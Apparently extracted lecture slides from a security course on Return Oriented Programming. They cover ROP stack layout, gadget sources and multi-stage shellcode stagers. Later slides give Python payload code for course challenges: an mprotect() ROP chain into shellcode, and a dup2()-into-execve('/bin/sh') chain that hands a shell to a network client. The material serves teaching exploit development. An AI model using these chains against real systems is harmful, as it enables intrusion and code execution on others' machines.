![Page 56: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/56.jpg)
© Compass Security Schweiz AG Slide 56 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
pop eax pop ebx ret
<0xaabb>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add>:
0x22
![Page 57: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/57.jpg)
© Compass Security Schweiz AG Slide 57 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
pop eax pop ebp ret
<0xaabb>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add2>:
0x22
![Page 58: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/58.jpg)
© Compass Security Schweiz AG Slide 58 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
pop eax pop ebp ret
<0xaabb>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add2>:
0x22
![Page 59: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/59.jpg)
© Compass Security Schweiz AG Slide 59 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
SIP (&<add2>)
SIP (&<…>
0x11 ESP EIP
pop eax pop ebp ret
<0xaabb>:
mov 0x8(%esp),%eax add 0x4(%esp),%eax
ret
<add2>:
0x22
![Page 60: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/60.jpg)
© Compass Security Schweiz AG Slide 60 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
0x01
0x02
&<add2>
&pop/pop/ret
0x11
0x22
ret
ret
ret
&<func>
![Page 61: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/61.jpg)
© Compass Security Schweiz AG Slide 61 www.csnc.ch
ROP By Example
&blubb
SIP (&<add>)
SFP
isAdmin
firstname
&blubb &pop/pop/ret
<add> arg 2: 0x01
<add> arg 2: 0x02
&<add2>
&pop/pop/ret
<add2> arg 2: 0x11
<add2> arg 2: 0x22
ret
ret
ret
&<func>
ret
![Page 62: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/62.jpg)
© Compass Security Schweiz AG Slide 62 www.csnc.ch
ROP By Example
SIP (&<add>) SFP isAdmin firstname &pop/pop/ret 0x01 0x02
ret ret
&<add2>
Writes go up
Stack grows down
ret
…
![Page 63: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/63.jpg)
© Compass Security Schweiz AG Slide 63 www.csnc.ch
ROP By Example
SIP (&<add>) SFP isAdmin firstname &pop/pop/ret 0x01 0x02
ret ret
&<add2>
ret
<stack> SIP ARG1 ARG2 For add():
<stack> For add2():
…
SIP
![Page 64: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/64.jpg)
© Compass Security Schweiz AG Slide 64 www.csnc.ch
ROP By Example
call/ can be chained!
Arbitrary code execution with not code uploaded
Addresses of gadgets
Arguments for gadgets (addresses, or immediates)
NOT: assembler instructions
![Page 65: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/65.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
ROP Tools
![Page 66: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/66.jpg)
© Compass Security Schweiz AG Slide 66 www.csnc.ch
Exploiting DEP: ROP Gadgets
ROPgadget
![Page 67: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/67.jpg)
© Compass Security Schweiz AG Slide 67 www.csnc.ch
ROPgadget
ROPgadget.py --ropchain
![Page 68: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/68.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Some more ROP Infos
![Page 69: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/69.jpg)
© Compass Security Schweiz AG Slide 69 www.csnc.ch
Some more ROP Infos
Where to take gadgets from?
Either: The program code
Shared library code (LIBC etc.)
![Page 70: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/70.jpg)
© Compass Security Schweiz AG Slide 70 www.csnc.ch
Some more ROP Infos
Where to take gadgets from?
Either: The program code
Static location in memory (if not PIE)
Needs to be of some size to have enough gadgets
Shared library code (LIBC etc.)
Sadly, non-
![Page 71: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/71.jpg)
© Compass Security Schweiz AG Slide 71 www.csnc.ch
Some more ROP Infos
ROP shellcode usually consists of: Libc calls
malloc() / mprotect()
Preparations of libc calls
set up registers
read data to defeat ASLR
Skipping of shellcode arguments (pop/pop/ret)
![Page 72: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/72.jpg)
© Compass Security Schweiz AG Slide 72 www.csnc.ch
Some more ROP Infos
ROP is very inefficient
Needs a lot of gadgets
Not suitable to implement complete shellcode in it
Hello: Multi Stage Shellcode
![Page 73: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/73.jpg)
© Compass Security Schweiz AG Slide 73 www.csnc.ch
Some more ROP Infos
Stager: Change permission
• Set Stack executable
• Execute it (jmp)
• Profit
![Page 74: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/74.jpg)
© Compass Security Schweiz AG Slide 74 www.csnc.ch
Some more ROP Infos
Stager: Allocator
• Allocate new RWX memory
• Copy rest of shellcode to newly allocated memory
• Execute it (jmp)
• Profit
![Page 75: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/75.jpg)
© Compass Security Schweiz AG Slide 75 www.csnc.ch
Some more ROP Infos
Stage 0: ROP Allocate rwx Memory
Stage 1: ROP Copy minimal shellcode to memory
Jump to it
Stage 2: Shellcode Copy rest of the shellcode (meterpreter)
Jump to it
![Page 76: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/76.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Practical ROP
![Page 77: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/77.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Practical ROP: mprotect() + Shellcode
![Page 78: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/78.jpg)
© Compass Security Schweiz AG Slide 79 www.csnc.ch
Practical ROP
mprotect() ROP into shellcode Defeats: DEP
(Not: DEP+ASLR)
Get address of shellcode
SIP = ROPchain
ROP is doing:
mprotect(&shellcode, len(shellcode), rwx)
After ROPchain, jump to shellcode
Challenge: 16, https://exploit.courses/#/challenge/16
DEP enabled
ASLR disabled (can use LIBC gadgets)
![Page 79: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/79.jpg)
© Compass Security Schweiz AG Slide 80 www.csnc.ch
Practical ROP
mprotect() ROP into shellcode
# shellcode
payload = shellcode
payload += "A" * (offset - len(shellcode))
# rop starts here (SIP)
# 0x000000000003a718: pop rax; ret;
payload += p64 ( libcBase + 0x000000000003a718 )
payload += p64 ( 10 ) # syscall sys_mprotect
# 0x0000000000021102: pop rdi; ret;
payload += p64 ( libcBase + 0x0000000000021102 )
payload += p64 ( stackAddr ) # mprotect arg: addr
![Page 80: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/80.jpg)
© Compass Security Schweiz AG Slide 81 www.csnc.ch
Practical ROP
mprotect() ROP into shellcode
# 0x00000000000202e8: pop rsi; ret;
payload += p64 ( libcBase + 0x00000000000202e8 )
payload += p64 ( 4096 ) # mprotect arg: size
# 0x0000000000001b92: pop rdx; ret;
payload += p64 ( libcBase + 0x0000000000001b92)
payload += p64 ( 0x7 ) # protect arg: permissions
# 0x00000000000bb945: syscall; ret;
payload += p64 ( libcBase + 0x00000000000bb945)
payload += p64 ( shellcodeAddr )
![Page 81: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/81.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Practical ROP: dup2() into execv() with LIBC
![Page 82: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/82.jpg)
© Compass Security Schweiz AG Slide 83 www.csnc.ch
Practical ROP
dup2() into execv() with LIBC Defeats: DEP + ASLR
(Not: DEP+ASLR + PIE)
dup() client network socket into 0, 1 and 2
Challenge: 17
https://exploit.courses/#/challenge/17
DEP enabled
ASLR enabled
![Page 83: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/83.jpg)
© Compass Security Schweiz AG Slide 84 www.csnc.ch
Practical ROP
Socket: Is always 4 (find via debugging)
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 2 results, display max 2 items:
challenge17 : 0x400ed8 --> 0x68732f6e69622f ('/bin/sh')
libc : 0x7ff0519cd58b --> 0x68732f6e69622f
('/bin/sh')
![Page 84: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/84.jpg)
© Compass Security Schweiz AG Slide 85 www.csnc.ch
Practical ROP
# Start ROP chain
# 0x0000000000400eb1: pop rsi; pop r15; ret;
# dup2() syscall is 33
# dup2(4, 0)
payload += p64 ( pop_rax )
payload += p64 ( 33 )
payload += p64 ( pop_rdi )
payload += p64 ( 4 )
payload += p64 ( pop_rsi_r15)
payload += p64 ( 0 )
payload += p64 ( 0xdeadbeef1 )
payload += p64 ( syscall )
![Page 85: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/85.jpg)
© Compass Security Schweiz AG Slide 86 www.csnc.ch
Practical ROP
# dup2(4, 1)
payload += p64 ( pop_rax )
payload += p64 ( 33 )
payload += p64 ( pop_rdi )
payload += p64 ( 4 )
payload += p64 ( pop_rsi_r15)
payload += p64 ( 1 )
payload += p64 ( 0xdeadbeef2 )
payload += p64 ( syscall )
# dup2(4, 2)
payload += p64 ( pop_rax )
payload += p64 ( 33 )
payload += p64 ( pop_rdi )
payload += p64 ( 4 )
payload += p64 ( pop_rsi_r15)
payload += p64 ( 2 )
payload += p64 ( 0xdeadbeef3 )
payload += p64 ( syscall )
![Page 86: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/86.jpg)
© Compass Security Schweiz AG Slide 87 www.csnc.ch
Practical ROP
# execve
payload += p64 ( pop_rdi )
payload += p64 ( sh_addr ) # found in LIBC
payload += p64 ( pop_rsi_r15 )
payload += p64 ( 0x6020e0 ) # addr of 0 bytes
payload += p64 ( 0xdeadbeef4 )
payload += p64 ( pop_rax)
payload += p64 ( 59 )
payload += p64 ( syscall ) # execute execve()
payload += p64 ( 0x41414141 ) # fail
![Page 87: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/87.jpg)
© Compass Security Schweiz AG Slide 88 www.csnc.ch
Practical ROP
Write what where ROP:
# value to write
pop rax; ret
# memory location where we want to write the value
pop rdx; ret
# write rax at memory location indicated by rdx
mov ptr [rdx], rax; ret
![Page 88: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/88.jpg)
© Compass Security Schweiz AG Slide 89 www.csnc.ch
Practical ROP
# 0x00000000004009a0: pop rbp; ret;
# 0x0000000000400c91: pop rax; ret;
# 0x0000000000400c8e: mov dword ptr [rbp - 8], eax; pop rax; ret;
def write2mem(data, location, chain):
chain += p64( pop_rax )
chain += p64( data )
chain += p64( pop_rbp )
chain += p64( location + 8)
chain += p64( mov_ptr_rbp_eax)
chain += p64( 0xdeadbeef1 )
![Page 89: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/89.jpg)
© Compass Security Schweiz AG Slide 90 www.csnc.ch
Practical ROP
Where to write? Every binary has a read-write memory location at a static offset
gdb-peda$ vmmap
Start End Perm Name
0x00400000 0x00402000 r-xp challenge17
0x00601000 0x00602000 r--p challenge17
0x00602000 0x00603000 rw-p challenge17
![Page 90: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/90.jpg)
© Compass Security Schweiz AG Slide 91 www.csnc.ch
Practical ROP
Stack
Code
rw-
rw-
r-x
Read-write
Return Addresses on stack point to Code
ropchain
![Page 91: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/91.jpg)
© Compass Security Schweiz AG Slide 92 www.csnc.ch
Practical ROP
Stack
Code
rw-
rw-
r-x
Read-write
Write String or Shellcode to R/W memory
ropchain
![Page 92: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/92.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
Insomnihack Teaser
![Page 93: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/93.jpg)
© Compass Security Schweiz AG Slide 94 www.csnc.ch
Insomnihack Teaser
Insomnihack: Security Conference in Geneva
Got a Teaser CTF (Capture the Flag)
Baby challenge:
Forking Server
64 bit
ASLR
PIE
Stack Canary
![Page 94: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/94.jpg)
Tel +41 55 214 41 60 Fax +41 55 214 41 61 [email protected] www.csnc.ch
Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona
ROP: Conclusion
![Page 95: Return Oriented Programming · Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona](https://reader036.vdocuments.us/reader036/viewer/2022062415/5fc46586ff6d8e4f2252384f/html5/thumbnails/95.jpg)
© Compass Security Schweiz AG Slide 96 www.csnc.ch
ROP: Conclusion
Ret2libc / ret2got / ret2plt to execute arbitrary library functions
ROP Can execute arbitrary code by re-using existing code from program or shared
libraries
Can by itself defeat ASLR+ DEP
Can defeat ASLR+DEP+PIE with information disclosure
Find gadgets in: Program itself (if big enough, .text)
LIBC (if not ASLR)
LIBC (by using gadgets from .text to leak LIBC ptr via GOT)